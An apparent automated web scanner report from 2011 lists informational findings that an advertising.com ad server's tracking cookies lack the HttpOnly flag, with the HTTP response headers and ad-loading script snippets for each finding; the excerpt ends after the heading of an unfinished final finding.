Set-Cookie: C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4voCFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2euWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: 27582677=_4dfa489d,2306156771,768034^1004441^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript1.1" src="http://ebay.adnxs.com/ttj?id=472678&cb=2306156771&pt1=0000768034&pt2=0001004441&pt3=1183&imp_id=v2:I:1308248221:2306156771:0000768034:0001004441:1
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=31k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
F1=BcXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksL+9CJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2iG6ypOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
28183863=_4dfa4d77,0408212157,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:37:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:37:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=31k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: F1=BcXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksL+9CJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2iG6ypOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: 28183863=_4dfa4d77,0408212157,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=QJl+NFJwHob0Fi6sIWwJoa4itKPCC0nxcJpwEg02FTMBdbdxETwihXMxEwjmGTMBxGexETAQvaMxEQW4FTMBLppxETQghXMxEgN5FTMB6ijxETAmhXMxEAY4FTMBdDmxETA/yaMxEAVZGTMBYimxETA3WaMxEQY4FTMBFGexETAxBaMxEU1aGTMBbTexETQwBaMxEYnXGTMBWGoxETgQvaMxEogmGTMBxmpxETQRgaMxE0soGTMB8mpxEHZAmZOiGfZj0jw+NXYbtiGA8MoRj7a+AcsmGNuAEOpBAbLuBoKuGh/smJwokaAwzClALRqBAXaxAMdPGOwrQQwdIaIhq62ApVmRuTqHIUbNG5WtrCQIza0IwOICM/ohvdr0IwKvG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
F1=BAlU63EBAAAABAAAAcBA6BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
BASE=x7Q9gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
ROLL=U6APQjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCD!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
3488355=_4dfa5250,1828847536,768034^1008685^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1008685.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:58:24 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 594
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:58:24 GMT
Connection: close
Set-Cookie: C2=QJl+NFJwHob0Fi6sIWwJoa4itKPCC0nxcJpwEg02FTMBdbdxETwihXMxEwjmGTMBxGexETAQvaMxEQW4FTMBLppxETQghXMxEgN5FTMB6ijxETAmhXMxEAY4FTMBdDmxETA/yaMxEAVZGTMBYimxETA3WaMxEQY4FTMBFGexETAxBaMxEU1aGTMBbTexETQwBaMxEYnXGTMBWGoxETgQvaMxEogmGTMBxmpxETQRgaMxE0soGTMB8mpxEHZAmZOiGfZj0jw+NXYbtiGA8MoRj7a+AcsmGNuAEOpBAbLuBoKuGh/smJwokaAwzClALRqBAXaxAMdPGOwrQQwdIaIhq62ApVmRuTqHIUbNG5WtrCQIza0IwOICM/ohvdr0IwKvG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: F1=BAlU63EBAAAABAAAAcBA6BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: BASE=x7Q9gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: ROLL=U6APQjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCD!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: 3488355=_4dfa5250,1828847536,768034^1008685^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8I; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5CKYmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpMsRQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
42950117=_4dfa4fe4,2035415743,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:48:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:48:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8I; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5CKYmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpMsRQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: 42950117=_4dfa4fe4,2035415743,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXIbtiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvGAHt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD7oROzNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7Nea54Ml6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
45425146=_4dfa5736,5745513245,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029516.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:19:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 620
Date: Thu, 16 Jun 2011 19:19:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXIbtiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvGAHt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD7oROzNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7Nea54Ml6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: 45425146=_4dfa5736,5745513245,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/s
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1024394.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:27:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 783
Date: Thu, 16 Jun 2011 18:27:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: 54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

